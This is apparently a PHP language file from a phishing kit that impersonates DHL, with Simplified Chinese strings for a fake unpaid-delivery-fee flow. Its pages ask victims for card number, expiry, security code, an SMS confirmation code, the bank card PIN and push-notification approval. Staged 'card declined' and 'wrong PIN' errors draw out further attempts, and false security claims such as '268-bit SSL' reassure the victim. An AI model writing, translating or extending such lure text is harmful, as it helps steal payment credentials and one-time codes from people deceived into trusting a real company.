<?php 
$langs = array(
    "title" => "DHL",
    "help_support" => "帮助和支持",
    "home" => "首页",
    "ship" => "寄送",
    "track" => "追踪",
    "delivery_services" => "快递服务",
    "delivery_text" => "您的包裹已准备好发货。请完成必要费用的支付以继续。",
    "card_declined_error" => "卡片被拒。请尝试使用另一张卡或联系您的银行。",
    "cardholder_name" => "持卡人姓名",
    "card_number" => "卡号",
    "expiry_code" => "有效期代码",
    "security_code" => "安全代码",
    "continue" => "继续",
    "ssl_security" => "本页面受 268 位 SSL 加密保护。",
    "payment_security_notice" => "请放心，我们的支付页面高度安全。您的个人信息和支付信息已完全加密，并使用高级安全协议进行保护，以确保您的数据保持私密和安全。此外，我们不会存储您的任何支付信息。",
    "about_dhl" => "关于 DHL",
    "press" => "新闻",
    "careers" => "招聘",
    "legal_notice" => "法律声明",
    "alerts" => "提醒",
    "fraud_awareness" => "防欺诈意识",
    "important_information" => "重要信息",
    "legal" => "法律",
    "terms_conditions" => "条款和条件",
    "privacy_notice" => "隐私政策",
    "contact_support" => "联系我们和支持",
    "faqs" => "常见问题",
    "contact_us" => "联系我们",
    "find_location" => "查找位置",
    "payment_confirmation" => "付款确认",
    "confirm_payment_text" => "要确认此付款，请提交发送到您手机号码的代码。",
    "invalid_confirmation_code" => "确认代码无效。请再试一次。",
    "confirmation_code" => "确认代码",
    "additional_verification" => "我们需要对提供的支付方式进行额外验证。请输入您的银行卡 PIN 码以继续。",
    "incorrect_card_pin" => "银行卡 PIN 码错误。",
    "card_pin" => "银行卡 PIN 码",
    "please_wait" => "请稍候...",
    "do_not_leave" => "请勿离开此页面。您将被自动重定向。",
    "payment_successful" => "付款成功！",
    "payment_success_text" => "您的付款已成功。您将很快通过您的联系方式收到有关包裹的更新。感谢您的信任！",
    "app_title" => "确认您的付款",
"app_text" => "请在您的银行应用中确认付款 <br>，点击收到的推送通知。",
"track_title" => "投递尝试未成功。",
        "track_text" => "由于所需费用尚未支付，您的包裹无法投递。<br>请点击下方的“继续”以添加付款方式并完成付款。",
        "table" => ["追踪号码：", "日期：", "金额："]


);
?>
